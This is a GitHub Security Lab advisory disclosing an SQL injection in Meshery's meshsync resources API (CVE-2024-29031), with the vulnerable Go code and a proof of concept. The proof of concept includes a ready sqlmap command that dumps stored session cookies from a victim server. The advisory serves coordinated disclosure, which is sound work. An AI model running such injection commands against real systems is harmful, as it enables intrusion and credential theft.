skip to content
Back to
Home Research Advisories CodeQL Wall of Fame Get Involved Events
March 21, 2024

GHSL-2023-249: SQL injection vulnerability in Meshery - CVE-2024-29031

GitHub Security Lab

Coordinated Disclosure Timeline


A SQL injection vulnerability in Meshery up to v0.6.181 allows a remote attacker to obtain sensitive information via the order parameter of GetMeshSyncResources.



Tested Version



SQL injection in GetMeshSyncResources (GHSL-2023-249)

The Meshery project exposes the function GetMeshSyncResources at the API URL /api/system/meshsync/resources. The order query parameter is directly used to build a SQL query in line 135 of the meshync_handler.go file, as it can be seen in the following snippet:

func (h *Handler) GetMeshSyncResources(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {
	// --snip--
	order := r.URL.Query().Get("order")
	sort := r.URL.Query().Get("sort")
	// --snip--

	result := provider.GetGenericPersister().Model(&model.KubernetesResource{}).

        // --snip--

	if order != "" {
		if sort == "desc" {
			// --snip--
		} else {
			result = result.Order(order)

	err := result.Find(&resources).Error
	// --snip--


This issue may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command.

Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system.

Arbitrary data read and write may be a problem depending on several factors:

Proof of Concept

To reproduce this issue, the following three requests can be used to write a file at an arbitrary location with arbitrary contents (note that an appropriate cookie needs to be used in the request, for local authentication use Cookie: meshery-provider=None):


Verify that the test file was created:

cat /tmp/test

Also, arbitrary database entries can be created by issuing a request to the following URL:


To extract information from the database, blind SQL injection techniques must be used. For instance, we could use sqlmap to automate the process of dumping the request cookies used in a performance profile:

$ sqlmap -u 'http://(victim server):9081/api/system/meshsync/resources?order=1*' --technique S --dbms SQLite --header "Cookie: meshery-provider=None" --drop-set-cookie --ignore-code=500 --batch -T performance_profiles -C request_cookies --dump


Table: performance_profiles
[1 entry]
| request_cookies           |
| {"Session": "test_value"} |



This issue was discovered and reported by GitHub CodeQL team member @atorralba (Tony Torralba). The vulnerability was found with the help of CodeQL’s SQL injection query.


You can contact the GHSL team at, please include a reference to GHSL-2023-249 in any communication regarding this issue.